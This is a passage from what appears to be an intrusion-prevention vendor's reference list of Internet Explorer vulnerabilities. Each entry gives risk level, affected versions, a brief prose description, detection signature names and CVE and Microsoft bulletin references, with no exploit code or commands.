Situation: HTTP_SS-Microsoft-Internet-Explorer-Object-Management-CVE-2011-1345
File-Text_Microsoft-Internet-Explorer-Object-Management-CVE-2011-1345
References:
CVE-2011-1345
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1345
BID-46821
http://www.securityfocus.com/bid/46821
MS11-018
http://technet.microsoft.com/security/bulletin/MS11-018
Back to top

Microsoft-Internet-Explorer-Object-Reference-Counting-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-134-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability Microsoft Internet Explorer. Internet Explorer incorrectly handles initialized or removed objects, causing memory corruption. Remote attackers can exploit this vulnerability by persuading target users to visit a specially crafted web page. Successful exploitation may allow the attacker to execute arbitrary code on the vulnerable client system, in the context of the logged in user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Object-Reference-Counting-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Object-Reference-Count-Memory-Corruption
References:
CVE-2007-3902
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3902
BID-26506
http://www.securityfocus.com/bid/26506
MS07-069
http://technet.microsoft.com/security/bulletin/MS07-069
Back to top

Microsoft-Internet-Explorer-Object-Tag-Popup

About this vulnerability: A object type validation error in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-267-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Input Validation
Description: An object type validation error exists in Internet Explorer. While assuming that the popup content is either html or javascript it is still executed even when its not. This may lead to a system compromise.
Situation: HTTP_SS-Internet-Explorer-Object-Tag-Popup
HTTP_SS-Internet-Explorer-Object-Type-Open-Window
File-Text_Internet-Explorer-Object-Tag-Popup
File-Text_Internet-Explorer-Object-Type-Open-Window
References:
CVE-2003-0838
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0838
BID-8556
http://www.securityfocus.com/bid/8556
OSVDB-7872
http://www.osvdb.org/7872
MS03-040
http://technet.microsoft.com/security/bulletin/MS03-040
Back to top

Microsoft-Internet-Explorer-Objects-Handling-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows Vista; Windows 2003; Windows 2008
Software: Internet Explorer 6.0; Internet Explorer 7.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer. A crafted webpage can cause Internet Explorer to access uninitialized memory leading to a crash or execution of arbitrary code within the context of the currently logged in user. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any injected code will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Internet Explorer may terminate abnormally.
Situation: File-Text_Microsoft-Internet-Explorer-Objects-Handling-Memory-Corruption
References:
CVE-2008-2254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2254
BID-30614
http://www.securityfocus.com/bid/30614
MS08-045
http://technet.microsoft.com/security/bulletin/MS08-045
Back to top

Microsoft-Internet-Explorer-OnMove-Use-After-Free-CVE-2012-1529

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-480-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-OnMove-Use-After-Free-CVE-2012-1529
References:
CVE-2012-1529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1529
BID-55641
http://www.securityfocus.com/bid/55641
OSVDB-85571
http://www.osvdb.org/85571
MS12-063
http://technet.microsoft.com/security/bulletin/MS12-063
Back to top

Microsoft-Internet-Explorer-Onpropertychange-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-547-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A use-after-free vulnerability exists in Internet Explorer. The vulnerability is due to an error in the way onpropertychange events are handled. A remote attacker could exploit these vulnerabilities by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Onpropertychange-Use-After-Free
References:
CVE-2013-3897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3897
OSVDB-98207
http://www.osvdb.org/98207
MS13-080
http://technet.microsoft.com/security/bulletin/MS13-080
Back to top

Microsoft-Internet-Explorer-onreadystatechange-CVE-2012-0170

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0; Internet Explorer 6.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-onreadystatechange-CVE-2012-0170
References:
CVE-2012-0170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0170
BID-52904
http://www.securityfocus.com/bid/52904
OSVDB-81128
http://www.osvdb.org/81128
MS12-023
http://technet.microsoft.com/security/bulletin/MS12-023
Back to top

Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 7; Windows 2008; Windows 2008 R2
Software: Internet Explorer 9.0
Type: Malfunction
Description: A use after free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects if the HTML markup is overwritten inside an onreadystatechange event handler. A remote unauthenticated attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free
Back to top

Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free-CVE-2010-0491

About this vulnerability: A memory corruption vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-298-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document to execute non-privileged arbitrary code.
Situation: HTTP_SS-Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free
File-Text_Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free-CVE-2010-0491
References:
CVE-2010-0491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0491
BID-39027
http://www.securityfocus.com/bid/39027
OSVDB-63331
http://www.osvdb.org/63331
MS10-018
http://technet.microsoft.com/security/bulletin/MS10-018
Back to top

Microsoft-Internet-Explorer-Option-Element-Use-After-Free

About this vulnerability: Microsoft Internet Explorer Option Element Use After Free vulnerability.
Risk: High
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer, versions 6 through 8, which allows remote attackers to execute arbitrary code by dereferencing already freed memory. This is possible due to the Option cache not being properly updated, allowing other JavaScript methods to access a deleted Option element.
Situation: Generic_SS-Microsoft-Ie-Body-Element-Use-After-Free
File-Text_Microsoft-Ie-Body-Element-Use-After-Free
References:
CVE-2011-1996
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1996
OSVDB-76208
http://www.osvdb.org/76208
MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081
Back to top

Microsoft-Internet-Explorer-Out-Of-Bounds-Vulnerability-CVE-2018-0996

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There has been reported an out-of-bounds vulnerability in Internet Explorer browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Out-Of-Bounds-Vulnerability-CVE-2018-0996
References:
CVE-2018-0996
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0996
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Internet-Explorer-outerHTML-Information-Disclosure

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0
Type: Input Validation
Description: There is an information disclosure vulnerability in Microsoft Internet Explorer when processing javascript that references an object's outerHTML attribute.
Situation: File-Text_Microsoft-Internet-Explorer-outerHTML-Information-Disclosure
References:
CVE-2006-3280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3280
BID-18682
http://www.securityfocus.com/bid/18682
MS06-042
http://technet.microsoft.com/security/bulletin/MS06-042
Back to top

Microsoft-Internet-Explorer-Plugin-Loading-Address-Bar-Spoofing

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is an address bar spoofing vulnerability in the Microsoft Internet Explorer. The vulnerability is specific to improperly handling resources that require a plugin to be processed. This flaw can be used to spoof the address bar of the browser to mislead a user as to the origin of a resource. Upon exploitation, the affected client browser will render a resource from a specific domain while the address bar of the browser will display a different domain, not reflecting the true origin of the resource. No other inconsistent behaviour will be observed after exploitation.
Situation: File-Text_Microsoft-Internet-Explorer-Plugin-Loading-Address-Bar-Spoofing
References:
CVE-2006-1626
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1626
BID-17404
http://www.securityfocus.com/bid/17404
MS06-021
http://technet.microsoft.com/security/bulletin/MS06-021
Back to top

Microsoft-Internet-Explorer-Popup-Title-Bar-Spoofing

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0
Type: Malfunction
Description: A vulnerability exists in the way Internet Explorer displays content in the title bar for script-initiated popup windows. With a DNS server that supports wild-card resolving, a trusted hostname can be displayed as the starting part of a malicious hostname in the popup window's title bar. This can be used to mislead a user into thinking that a trusted site is visited, while the page is loaded with attacker-supplied content. A second related vulnerability exists in the way Internet Explorer displays content in the title bar for script-initiated popup windows. When the content of a title tag in HTML contains scheme content (i.e., &quot;http://&quot;), the text is displayed in the title bar. This can be used to mislead a user into thinking that a trusted site is visited. When the target opens a malicious link from the attacker, the target system will pop up a window with new content. The malicious pop-up window does not have an address bar and therefore, only the content of the title bar reveals information about the source of the content. Using either the domain name or title tag vulnerabilities, a trusted URL may be spoofed in the title bar. The target user may be deceived into sending confidential information.
Situation: File-Text_Microsoft-Internet-Explorer-Popup-Title-Bar-Spoofing
References:
CVE-2005-0500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0500
BID-12602
http://www.securityfocus.com/bid/12602
Back to top

Microsoft-Internet-Explorer-Print-Preview-Handling-Command-Execution

About this vulnerability: Command execution vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-191-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0
Type: Script Injection
Description: There is a command execution vulnerability in Microsoft Internet Explorer. The application has improper security enforcement in the implementation of Print Preview. Remote attackers can exploit this vulnerability by persuading target users to visit a specially-crafted web page. Successful exploitation may allow the attacker to execute arbitrary commands on the vulnerable client system in the context of the currently logged on user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Print-Preview-Handling-Command-Execution
File-Text_Microsoft-Internet-Explorer-Print-Preview-Handling-Command-Execution
References:
CVE-2008-2259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2259
BID-30612
http://www.securityfocus.com/bid/30612
MS08-045
http://technet.microsoft.com/security/bulletin/MS08-045
Back to top

Microsoft-Internet-Explorer-Propertydesc-Double-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer.
Situation: File-TextId_Microsoft-Internet-Explorer-Propertydesc-Double-Free
References:
CVE-2016-0111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0111
MS16-023
http://technet.microsoft.com/security/bulletin/MS16-023
Back to top

Microsoft-Internet-Explorer-Race-Condition-CVE-2011-1257

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: HTTP_SS-Microsoft-Internet-Explorer-Race-Condition-CVE-2011-1257
File-Text_Microsoft-Internet-Explorer-Race-Condition-CVE-2011-1257
References:
CVE-2011-1257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1257
MS11-057
http://technet.microsoft.com/security/bulletin/MS11-057
Back to top

Microsoft-Internet-Explorer-Redirect-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-400-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008
Software: Internet Explorer 9.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error handling HTTP 30x server redirect responses that contain the CDL protocol.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Redirect-Memory-Corruption
HTTP_SHS-Microsoft-Internet-Explorer-Redirect-Memory-Corruption
References:
CVE-2011-1262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1262
OSVDB-72952
http://www.osvdb.org/72952
MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050
Back to top

Microsoft-Internet-Explorer-Remote-Code-Execution-CVE-2009-3762

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-268-3038
Last changed: sgpkg-ips-1734-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008
Software: Internet Explorer 6.0; Internet Explorer 7.0
Type: Input Validation
Description: There is a remote code execution vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Remote-Code-Execution-CVE-2009-3762
File-Text_Microsoft-Internet-Explorer-Style-Object-Memory-Corruption
References:
CVE-2009-3762
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3762
Back to top

Microsoft-Internet-Explorer-Runtimestyle-Handling-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 8; Windows 2008; Windows 2012
Software: Internet Explorer 10.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Runtimestyle-Handling-Memory-Corruption
References:
CVE-2013-3882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3882
OSVDB-98204
http://www.osvdb.org/98204
MS13-080
http://technet.microsoft.com/security/bulletin/MS13-080
Back to top

Microsoft-Internet-Explorer-Same-Id-Property-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0
Type: Malfunction
Description: There exists a remote code execution vulnerability in Internet Explorer. Exploitation of the vulnerability could lead to the execution of arbitrary code in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Same-Id-Property-Use-After-Free
References:
CVE-2012-1875
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1875
OSVDB-82865
http://www.osvdb.org/82865
MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037
Back to top

Microsoft-Internet-Explorer-Same-Origin-Policy-Bypass

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A same-origin policy bypass vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to error in updating origin data. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a web page. Successful exploitation can result in the disclosure of information about other web pages opened by the user or stored in the browser cache.
Situation: File-Text_Microsoft-Internet-Explorer-Same-Origin-Policy-Bypass
References:
CVE-2015-0072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0072
BID-72489
http://www.securityfocus.com/bid/72489
OSVDB-117876
http://www.osvdb.org/117876
MS15-018
http://technet.microsoft.com/security/bulletin/MS15-018
Back to top

Microsoft-Internet-Explorer-Script-Engine-Stack-Exhaustion

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a stack exhaustion vulnerability in the Microsoft Internet Explorer Script Engine. The flaw is caused by certain types of recursive function calls in Javascript code. An attacker can exploit this vulnerability to cause a denial of service condition of the vulnerable application.
Situation: File-Text_Microsoft-Internet-Explorer-Script-Engine-Stack-Exhaustion
References:
BID-16687
http://www.securityfocus.com/bid/16687
Back to top

Microsoft-Internet-Explorer-Scripting-Engine-Vulnerability-CVE-2018-0866

About this vulnerability: A vulnerability in Microsoft Internet Explorer 11
Risk: High
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Input Validation
Description: There has been reported a use-after-free vulnerability in Microsoft Internet Explorer 11. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Scripting-Engine-Vulnerability-CVE-2018-0866
References:
CVE-2018-0866
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0866
ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb
Back to top

Microsoft-Internet-Explorer-Scrollintoview-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0;Internet Explorer 7.0;Internet Explorer 8.0;Internet Explorer 9.0;Internet Explorer 10.0;Internet Explorer 11.0
Type: Malfunction
Description: A use after free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Scrollintoview-Use-After-Free
References:
CVE-2015-0017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0017
BID-72402
http://www.securityfocus.com/bid/72402
OSVDB-118141
http://www.osvdb.org/118141
MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009
Back to top

Microsoft-Internet-Explorer-Select-Element-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1733-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to the way in which IE handles list indices for certain objects. A remote attacker could exploit this vulnerability by enticing a target user to view a specially crafted webpage, or open a crafted Microsoft Office document that hosts the IE rendering engine and contains an ActiveX control marked &quot;safe for initialization&quot;. A successful attack could result in the execution of arbitrary code in the security context of the target user.
Situation: File-Text_MS-Internet-Explorer-Select-Element-Remote-Code-Execution
References:
CVE-2011-1999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1999
BID-49964
http://www.securityfocus.com/bid/49964
OSVDB-76211
http://www.osvdb.org/76211
MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081
Back to top

Microsoft-Internet-Explorer-SelectAll-CVE-2012-0171

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 6.0; Internet Explorer 9.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-SelectAll-CVE-2012-0171
References:
CVE-2012-0171
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0171
BID-52905
http://www.securityfocus.com/bid/52905
MS12-023
http://technet.microsoft.com/security/bulletin/MS12-023
Back to top

Microsoft-Internet-Explorer-Selection.empty-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A User-After-Free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to improper handling of the selection.empty script expression. Remote attackers can exploit this vulnerability by enticing target users to open a malicious web page using Internet Explorer, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user. In an attack scenario where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the logic of the malicious code. If such an attack is not successful, Internet Explorer may terminate abnormally.
Situation: File-Text_Microsoft-Internet-Explorer-Selection.empty-Use-After-Free
References:
CVE-2011-1261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1261
OSVDB-72951
http://www.osvdb.org/72951
MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050
Back to top

Microsoft-Internet-Explorer-Shell.Application-Object-Vulnerability-v1.0

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Code Injection
Description: There is a weakness in the way Internet Explorer, a web browser developed and maintained by Microsoft Corporation, handles the ActiveX components Shell.Application and Wscript.Shell. Using known, unpatched vulnerabilities to cross into a less restricted security zone, an attacker can use these ActiveX objects to execute arbitrary code.
Situation: File-Text_Shell.Application-ActiveX-Object-Local-File-Execute
References:
BID-10652
http://www.securityfocus.com/bid/10652
Back to top

Microsoft-Internet-Explorer-Speech-Control-Memory-Corruption

About this vulnerability: Remote exploitable vulnerability in Microsoft Speech API
Risk: High
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 7.0
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Microsoft Speech API (SAPI) ActiveX controls. The vulnerability can be triggered by passing overly long string to various method of the SAPI ActiveX controls. An attacker can exploit this vulnerability for code execution by enticing a target user to open a malicious HTML document. Any code injected using this vulnerability would be executed in the security context of the currently logged in user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Speech-Control-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Speech-Control-Memory-Corruption
References:
CVE-2007-2222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2222
BID-24426
http://www.securityfocus.com/bid/24426
OSVDB-35353
http://www.osvdb.org/35353
MS07-033
http://technet.microsoft.com/security/bulletin/MS07-033
Back to top

Microsoft-Internet-Explorer-Status-Bar-Url-Spoofing

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability exists in the way Microsoft Internet Explorer displays a URL in the status bar. A specially crafted HTML link can be masqueraded in the status bar to an arbitrary URL. This can be used by an attacker to entice a user into visiting a malicious web page that, through masquerading, appears to be a trusted web page.
Situation: File-Text_Microsoft-Internet-Explorer-Status-Bar-Url-Spoofing
References:
BID-11561
http://www.securityfocus.com/bid/11561
Back to top

Microsoft-Internet-Explorer-Style-Object-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles CSS style objects. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation could result in execution of arbitrary code on the vulnerable system in the context of the logged-on user. In the case of a successful attack, the behaviour of the target machine is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Style-Object-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Style-Object-Memory-Corruption
References:
CVE-2009-3672
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3672
BID-37085
http://www.securityfocus.com/bid/37085
MS09-072
http://technet.microsoft.com/security/bulletin/MS09-072
Back to top

Microsoft-Internet-Explorer-Style-Object-Memory-Corruption-CVE-2011-1964

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A remote code execution vulnerability exists in Microsoft's Internet Explorer (IE). The vulnerability is due to insufficient validation of an object assigned as a style's behaviour. A remote attacker can exploit this vulnerability by enticing a target user to visit a crafted web page in IE. Successful exploitation could result in execution of arbitrary code in the target user's security context. An unsuccessful exploitation attempt may result in the abnormal termination of the affected IE process.
Situation: File-Text_MS-Internet-Explorer-Style-Object-Memory-Corruption-CVE-2011-1964
References:
CVE-2011-1964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1964
MS11-057
http://technet.microsoft.com/security/bulletin/MS11-057
Back to top

Microsoft-Internet-Explorer-SVG-Marker-Object-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-641-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A use after free vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an issue with dangling pointer reuse through the manipulation of document elements. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted page. Successful exploitation could lead to arbitrary code execution under the security context of the browser process.
Situation: File-TextId_Microsoft-Internet-Explorer-SVG-Marker-Object-Use-After-Free
References:
CVE-2015-1668
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1668
BID-74004
http://www.securityfocus.com/bid/74004
OSVDB-120622
http://www.osvdb.org/120622
MS15-032
http://technet.microsoft.com/security/bulletin/MS15-032
Back to top

Microsoft-Internet-Explorer-SVG-Memory-Corruption-CVE-2015-6134

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-TextId_Microsoft-Internet-Explorer-SVG-Memory-Corruption-CVE-2015-6134
References:
CVE-2015-6134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6134
MS15-124
http://technet.microsoft.com/security/bulletin/MS15-124
Back to top

Microsoft-Internet-Explorer-Table-Layout-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows Vista; Windows 2003; Windows 2008
Software: Internet Explorer 6.0; Internet Explorer 7.0
Type: Malfunction
Description: There a memory corruption issue with Internet Explorer related to HTML Table objects.
Situation: File-Text_Microsoft-Internet-Explorer-Table-Layout-Memory-Corruption
References:
CVE-2008-2258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2258
BID-30610
http://www.securityfocus.com/bid/30610
MS08-045
http://technet.microsoft.com/security/bulletin/MS08-045
Back to top

Microsoft-Internet-Explorer-Tabular-Data-Control-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
